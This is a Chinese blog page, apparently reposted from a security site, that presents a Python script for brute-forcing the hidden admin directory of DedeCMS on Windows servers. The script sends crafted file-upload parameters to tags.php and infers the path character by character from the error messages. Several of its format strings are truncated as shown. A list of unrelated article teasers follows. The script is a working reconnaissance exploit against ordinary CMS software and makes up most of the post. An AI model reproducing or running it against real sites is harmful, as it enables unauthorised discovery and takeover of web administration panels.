织梦服务器系统win10,WIN服务器爆破DEDECMS后台目录

利用脚本python:

#!/usr/bin/env python

'''/*

* author = Mochazz

* team = 红日安全团队

* env = pyton3

*

*/

'''

import requests

import itertools

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"

back_dir = ""

flag = 0

url = "http://192.168.1.9/tags.php"

data = {

"_FILES[mochazz][tmp_name]" : "./{p}<

"_FILES[mochazz][name]" : 0,

"_FILES[mochazz][size]" : 0,

"_FILES[mochazz][type]" : "image/gif"

}

for num in range(1,7):

if flag:

break

for pre in itertools.permutations(characters,num):

pre = ''.join(list(pre))

data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)

print("testing",pre)

r = requests.post(url,data=data)

if "Upload filetype not allow !" not in r.text and r.status_code == 200:

flag = 1

back_dir = pre

data["_FILES[mochazz][tmp_name]"] = "./{p}<

break

else:

data["_FILES[mochazz][tmp_name]"] = "./{p}<

print("[+] 前缀为:",back_dir)

flag = 0

for i in range(30):

if flag:

break

for ch in characters:

if ch == characters[-1]:

flag = 1

break

data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)

r = requests.post(url, data=data)

if "Upload filetype not allow !" not in r.text and r.status_code == 200:

back_dir += ch

print("[+] ",back_dir)

data["_FILES[mochazz][tmp_name]"] = "./{p}<

break

else:

data["_FILES[mochazz][tmp_name]"] = "./{p}<

print("后台地址为:",back_dir)

演示结果:

9b413092759a695fce88e4ddf4eaf6f6.gif

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/6591.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/489278.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

人工智能技术对专利制度的挑战与应对

来源&#xff1a;上海市法学会内容摘要人工智能技术作为人类的一项发明创造&#xff0c;本身具备了一定的创造力。无论是专利法治实践还是理论研究均无法否认&#xff0c;在弱人工智能时代&#xff0c;人工智能技术兼具发明创造工具和发明创造方案的提供者的双重身份。由此导致…

网络推广恶意点击js_做好网络推广,是做好网络营销的必要条件

互联网社会里网络无处不在&#xff0c;商机无处不在&#xff0c;企业通过网络营销&#xff0c;能有效的避免线下竞争激烈的市场&#xff0c;做好网络推广&#xff0c;是做好网络营销的必要条件。一个优秀的网络推广团队不但能实现提高企业的知名度的目的&#xff0c;还能帮助企…

css盒子模型_css的盒子模型是什么

CSS盒子模型就是在网页设计中经常用到的CSS技术所使用的一种思维模型。css盒子模型又称为框模型 (Box Model) &#xff0c;包含了元素内容(content)、内边距(padding)、边框(border)、外边距(margin)几个要素组成了盒子模型。图中最内部的框是元素的实际内容&#xff0c;也就是…

6G应用场景有哪些?首份6G报告给你揭晓

来源&#xff1a; 5G产业圈导 读中国移动研究院无线与终端技术研究所所长丁海煜介绍称&#xff0c;按照移动通信产业“使用一代、建设一代、研发一代”的发展节奏&#xff0c;业界预期6G将于2030年左右实现商用。“创新、协调、绿色、开放、共享”应成为5G向6G演进的新发展理念…

linux python 图形界面开发_python在linux制作图形界面(snack)

snack是一个用于在linux制作图形界面&#xff08;GUI&#xff09;的模块&#xff0c;该模块由c编写&#xff0c;而且redhat的系统都自带这个模块。 1.获取模块 虽然redhat系统会自带这个模块&#xff0c;但是直接去import snack会提示找不到模块&#xff0c;一个原因是我们重装…

虚拟搭建局域网模拟器_巧用虚拟局域网,快速搭建私有云,一步就能搞定

前段时间公司一直在使用局域网来进行文件共享&#xff0c;用一台电脑把某个文件夹在局域网里共享出来&#xff0c;其他电脑远程访问&#xff0c;但是这样使用太麻烦&#xff0c;要是主电脑忘记开机&#xff0c;其它人就用不了。再就是&#xff0c;一旦离开公司之后&#xff0c;…

5个层级带你看清一颗芯片的内部结构

来源&#xff1a;北京物联网智能技术应用协会导 读在我们阐明半导体芯片之前&#xff0c;我们先应该了解两点。其一半导体是什么&#xff0c;其二芯片是什么。

python使用shell命令_python 调用shell命令的方法

在python程序中调用shell命令&#xff0c;是件很酷且常用的事情…… 1. os.system(command) 此函数会启动子进程&#xff0c;在子进程中执行command&#xff0c;并返回command命令执行完毕后的退出状态&#xff0c;如果command有执行内容&#xff0c;会在标准输出显示。这实际上…

java中必检异常有哪些_Java面试题经典面试题220道(附答案)

Java基础&#xff1a;1.JDK 和 JRE 有什么区别&#xff1f;2. 和 equals 的区别是什么&#xff1f; 解读3. 两个对象的 hashCode() 相同&#xff0c; 那么 equals() 也一定为 true吗&#xff1f;4. final 在 Java 中有什么作用&#xff1f;5. Java 中的 Math. round(-1. 5) 等…

11项关键先进制造技术解读!

来源&#xff1a;中国指挥与控制学会图片&#xff1a;来源于网络上届美国总统奥巴马非常重视制造业。其发起成立的“先进制造业合作委员会”&#xff0c;Advanced Manufacturing Partnership&#xff0c;就未来制造业的发展做出了展望&#xff0c;重点规划11个技术领域&#xf…

网站程序数据库怎么上传到服务器上,网站的数据库怎么上传到服务器

网站的数据库怎么上传到服务器 内容精选换一换通常在将数据导入数据库前&#xff0c;即将入库的数据已经在相关主机上了。我们称这种保存着待入库数据的服务器为数据服务器。此时&#xff0c;只需检测以确认数据服务器和GaussDB(for openGauss)集群能够正常通信&#xff0c;并查…

知道接口地址 如何传数据_数据不知道如何可视化?一款工具推荐给大家

之前我们介绍过 Python 里面的一些数据分析和可视化工具&#xff0c;比如 Pandas、Modin、Dash 等。今天要介绍一款标星 12.1K 的数据可视化工具 bokeh&#xff0c;优雅、简洁、高性能的交互式可视化库&#xff0c;同时支持大数据量和流式数据。其中 PyPI 和 Conda 每月安装超过…

c# 从一组数中随机抽取一定个数_Python随机模块22个函数详解

随机数可以用于数学&#xff0c;游戏&#xff0c;安全等领域中&#xff0c;还经常被嵌入到算法中&#xff0c;用以提高算法效率&#xff0c;并提高程序的安全性。平时数据分析各种分布的数据构造也会用到。random模块&#xff0c;用于生成伪随机数&#xff0c;之所以称之为伪随…

读书人:人机融合中的深度态势感知

雅典学院&#xff08;拉斐尔&#xff09;来源&#xff1a;人机与认知实验室“你现在的气质里&#xff0c;藏着你走过的路&#xff0c;读过的书和爱过的人。"— 电影《卡萨布兰卡》里的一句话《追问人工智能》--刘伟 - 读书人视频如下&#xff1a;https://www.bilibili.com…

根据id 隐藏_明星ID价值四位数?吃鸡玩家崩溃:打工一个月工资还没名称值钱...

01你知道吗&#xff1f;和平精英游戏名称也很值钱&#xff1f;——最近&#xff0c;有这样一条消息出现在了我的面前&#xff0c;某和平精英角色明星名称的价格居然被捧到了千元之上&#xff0c;对&#xff0c;各位没有看错&#xff0c;虽然只是一个普普通通的游戏名称&#xf…

范式变革与规律涌现:世界科技发展新趋势

来源&#xff1a;学习时报新科技革命与产业变革持续展开&#xff0c;以人工智能为代表的新兴使能技术驶入“快车道”&#xff0c;世界科技创新被认为正在进入“认知革命”的阶段——对生命过程的“精微刻画与操作”和对人类智能的“逆向工程与强化”。趋势特征从“大停滞”迈向…

Unity5和WebGL移植指南的一些总结

对于手游开发者来说&#xff0c;更新版本往往意味着非常复杂的过程&#xff0c;你需要根据反馈做更新、测试、提交然后等待审核&#xff0c;而由于不需要客户端依赖&#xff0c;页游往往是快速测试游戏版本的最佳途径&#xff0c;很多人可能都知道Unity 5可以再不用Unity Web P…

java indexof方法_【3-14】Java中集合类list的增删改查

Hello&#xff0c;大家好&#xff0c;我是大家最亲爱的siki老师&#xff0c;每天都会在这里为大家带来一个Java语法中有趣的知识点&#xff0c;Q群175158287&#xff0c;欢迎同大家多多交流哈&#xff01;今天给大家带来的是Java中list类的使用&#xff0c;java.util 包提供了l…

清华大学孙富春教授:基于知识智能的机器人技能学习

来源&#xff1a;学术通在刚结束的2019中国人工智能产业年会分论坛——“知识智能及其产业应用论坛”上&#xff0c;清华大学计算机科学与技术系教授、中国人工智能学会副理事长、国家杰青孙富春教授发表了题为《基于知识智能的机器人技能学习》的报告。孙富春教授报告聚焦人工…

图书管理系统可行性分析报告范例_会做可行性分析报告贺州专家团队*金

金兰8564ertyu-03会做可行性分析报告贺州专家团队*金不满意全额&#xff0c;三年内免费提供修改服务&#xff0c;目前&#xff0c;金兰企划已为上万家客户及伙伴提供了专业、精准的商业策划服务&#xff0c;并得到了客户及行业的一致好评。会做可行性分析报告贺州专家团队*金金…